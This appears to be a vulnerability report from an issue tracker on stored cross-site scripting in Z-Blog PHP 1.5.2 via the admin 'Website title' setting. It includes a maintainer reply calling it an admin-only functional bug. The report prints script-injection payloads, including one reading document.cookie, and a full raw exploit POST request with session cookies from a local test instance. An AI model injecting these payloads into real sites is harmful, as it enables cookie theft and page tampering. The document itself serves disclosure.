Z-Blog php has a stored Cross Site Scripting Vulnerability
I have found a stored Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1/test/zblogphp-master/zb_system/admin/index.php
Web site settings --> Basic setting --> Website title
payload:"/><script>confirm(1234)</script>
save it.
If you get the admin privilege, we have so many self-xss ways. This's just a functional bug which can break the management page.
By the way, we will fix this bug, thank you.
P.S. To save our time, please don't submit useless "XSS", and even some of which are features. For example, injecting "<script>" into article title or content..
Z-Blog php has a stored Cross Site Scripting Vulnerability
I have found a stored Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1/test/zblogphp-master/zb_system/admin/index.php
Web site settings --> Basic setting --> Website title
payload:"/><script>confirm(1234)</script>
save it.
exp
POST /test/zblogphp-master/zb_system/cmd.php?act=SettingSav&csrfToken=30440aaabfe797968365be7946a0fc8a HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/zblogphp-master/zb_system/admin/index.php?act=SettingMng
Content-Type: application/x-www-form-urlencoded
Content-Length: 1019
Cookie: timezone=8; username=admin; token=67afc0921f3adc02c6b8a8c32fa68c53ebac56e9a16a92342924e9d05609f78f1525347253; addinfotestzblogphp-master=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D; PHPSESSID=sv1dq8htd2l5heme25b1b2vvb1; artshu=1; xiaoxi=%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_yi_jian_jian_yi_2821%2F+target%3D_blank%3E%E6%84%8F%E8%A7%81%E5%BB%BA%E8%AE%AEBUG%E5%8F%8D%E9%A6%88%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_update_download%2F+target%3D_blank%3E20171101+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.6%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_update_download%2F+target%3D_blank%3E20170804+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.5%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_mo_ban_xia_zai_3611%2F+target%3D_blank%3E20170804+axublog%E6%A8%A1%E6%9D%BF%E4%B8%8B%E8%BD%BD%EF%BC%9Auedc%E3%80%90%E9%80%82%E5%90%881.0.5%E7%89%88%E6%9C%AC%E3%80%91%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_0038%2F+target%3D_blank%3E20170619+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.2%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_221437%2F+target%3D_blank%3E20170616+axublog1.0.1%E5%8F%91%E5%B8%83%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Fben_zhan_xian_zai_yong_de_hei_bai_190507%2F+target%3D_blank%3E20170614+%E9%BB%91%E7%99%BD%E8%93%9D%E4%B8%BB%E9%A2%98%E4%B8%8B%E8%BD%BD%3C%2Fa%3E+%3C%2Fp%3E+%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog100_jie_shao_he_181144%2F+target%3D_blank%3E20170610+axublog1.0.0%E5%8F%91%E5%B8%83%3C%2Fa%3E%3C%2Fp%3E%0D%0A
Connection: keep-alive
Upgrade-Insecure-Requests: 1
ZC_BLOG_HOST=http%3A%2F%2F127.0.0.1%2Ftest%2Fzblogphp-master%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=zblog"/><script>confirm(1234)</script>&ZC_BLOG_SUBNAME=Good+Luck+To+You%21&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba%7Casa&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_ADDITIONAL_SECURITY=1&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=



payload:"/><script>confirm(document.cookie)</script>
Affected Version:
1.5.2
The text was updated successfully, but these errors were encountered: